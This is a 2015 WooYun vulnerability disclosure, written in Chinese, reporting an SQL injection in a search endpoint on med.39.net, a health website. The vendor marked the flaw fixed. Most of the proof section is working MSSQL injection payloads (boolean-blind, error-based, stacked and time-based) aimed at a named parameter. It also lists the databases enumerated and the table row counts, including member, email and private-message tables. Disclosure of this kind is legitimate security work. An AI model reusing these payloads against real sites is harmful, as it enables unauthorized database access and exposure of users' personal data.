当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115300

漏洞标题:39健康网某处SQL注射漏洞涉及大量表

相关厂商:39健康网

漏洞作者: 路人甲

提交时间:2015-05-21 12:17

修复时间:2015-05-22 10:35

公开时间:2015-05-22 10:35

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-21: 细节已通知厂商并且等待厂商处理中
2015-05-22: 厂商已经确认,细节仅向厂商公开
2015-05-22: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

233

详细说明:

和上一个洞比较类似,上一个的确是修复了。但是在其他地方post的时候,问题又出现了。
POST /cds/ssk/list.aspx?LeftNavId=8&LeftNavSubId=8&PageIndex=1&SecondId=1 HTTP/1.1
Content-Length: 194
Content-Type: application/x-www-form-urlencoded
Cookie: ***
Host: med.39.net
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
Top1%24btnSearch=%cb%d1%20%cb%f7&Top1%24keywords=1&__EVENTVALIDATION=/wEWAwKLuYmzBwLJmJmhDQK1ua7iCo7ZrN4KLSRjbf8/Lc64b5gYwipN&__VIEWSTATE=/wEPDwUKMTI0NjM2NzQ5NGRkm%2b0HjFY8r0K9szydYFB8Qoqtpx8%3d

漏洞证明:

---
Parameter: SecondId (GET)
Type: boolean-based blind
Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace
Payload: LeftNavId=8&LeftNavSubId=8&PageIndex=1&SecondId=(SELECT (CASE WHEN
(9263=9263) THEN 9263 ELSE 9263*(SELECT 9263 FROM master..sysdatabases) END))
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: LeftNavId=8&LeftNavSubId=8&PageIndex=1&SecondId=1 AND 2316=CONVERT(
INT,(SELECT CHAR(113)+CHAR(113)+CHAR(118)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN
(2316=2316) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHA
R(122)+CHAR(113)))
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: LeftNavId=8&LeftNavSubId=8&PageIndex=1&SecondId=(SELECT CHAR(113)+C
HAR(113)+CHAR(118)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3237=3237) THEN CHAR(
49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(118)+CHAR(122)+CHAR(113))
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: LeftNavId=8&LeftNavSubId=8&PageIndex=1&SecondId=1;WAITFOR DELAY '0:
0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: LeftNavId=8&LeftNavSubId=8&PageIndex=1&SecondId=1 WAITFOR DELAY '0:
0:5'
---
[12:00:56] [INFO] the back-end DBMS is Microsoft SQL Server
back-end DBMS: Microsoft SQL Server 2005
available databases [26]:
[*] 39Security
[*] 39Security_15
[*] 39Security_17
[*] cme
[*] cme_beta
[*] DataCenter
[*] DataSetting_test
[*] distribution
[*] master
[*] medphoto
[*] MobileData
[*] model
[*] msdb
[*] PhotoDB
[*] ProductLibData
[*] ProductLibSetting
[*] RuiHui
[*] RuiHui2012
[*] Security39
[*] SecurityNew
[*] Survey
[*] tempdb
[*] wcyx
[*] xiaopro
[*] YaYuDB
[*] YunYinDB
Database: cme
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.Member | 80864 |
| dbo.EmailVerify | 39151 |
| dbo.TestPaperFinish | 39048 |
| dbo.ScoreLog | 36073 |
| dbo.TestPaperFinishMain | 32101 |
| dbo.OperationLog | 27744 |
| dbo.vW_MyOperationLog | 24125 |
| dbo.vW_OperationLog | 23886 |
| dbo.PointLists | 23283 |
| dbo.ToolPreviewLog | 22221 |
| dbo.vW_ToolPreviewLog | 22221 |
| dbo.DbDiseaseToDiagnoseCriterion | 14550 |
| dbo.vw_DbDiseaseToDiagnoseCriterion | 14550 |
| dbo.Answers | 12069 |
| dbo.DbDiseaseToInternationalClass | 11406 |
| dbo.vw_DbDiseaseToInternationalClass | 11406 |
| dbo.DbResourcesToDictionary | 8567 |
| dbo.vw_DbResourcesToDictionary | 8567 |
| dbo.ToolDrugDetaRelateInfo | 8156 |
| dbo.Article | 4882 |
| dbo.CourseLog | 4822 |
| dbo.DbPic | 4416 |
| dbo.vw_dbPic | 4416 |
| dbo.PrivateMsg | 4185 |
| dbo.vW_ReceivedPrivateMessage | 4185 |
| dbo.vW_SendedPrivateMessage | 4185 |
| dbo.DbOperationToICD | 3836 |
| dbo.vw_DbOperationToICD | 3836 |
| dbo.Region | 3378 |
| dbo.CourseList | 3223 |
| dbo.Questions | 2651 |
| dbo.DbDiseaseToClinicDepartment | 2608 |
| dbo.vw_DbDiseaseToClinicDepartment | 2608 |
| dbo.OperationLogBackUp | 2527 |
| dbo.MemberCard | 1908 |
| dbo.Concern | 1752 |
| dbo.vW_Concern | 1742 |
| dbo.vW_Concerned | 1734 |
| dbo.GroupTopicReply | 1653 |
| dbo.DbSymptomCode | 1620 |
| dbo.vw_DbSymptomCode | 1620 |
| dbo.MemberCardDetail | 1580 |
| dbo.DbClass | 1562 |
| dbo.ToolActionLog | 1481 |
| dbo.DbOperationToBase | 1355 |
| dbo.vw_DbOperationToBase | 1355 |
| dbo.Collection | 1264 |
| dbo.Comment | 1190 |
| dbo.DbResource | 1139 |
| dbo.vW_DbResource | 1139 |
| dbo.vW_Comment | 1135 |
| dbo.Say | 1060 |
| dbo.vW_Say | 1060 |
| dbo.DbDrugInteractions | 1036 |
| dbo.vw_DbDrugInteractions | 1036 |
| dbo.GroupMember | 1023 |

修复方案:

~~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-05-22 10:34

厂商回复:

已处理

最新状态:

2015-05-22:已修复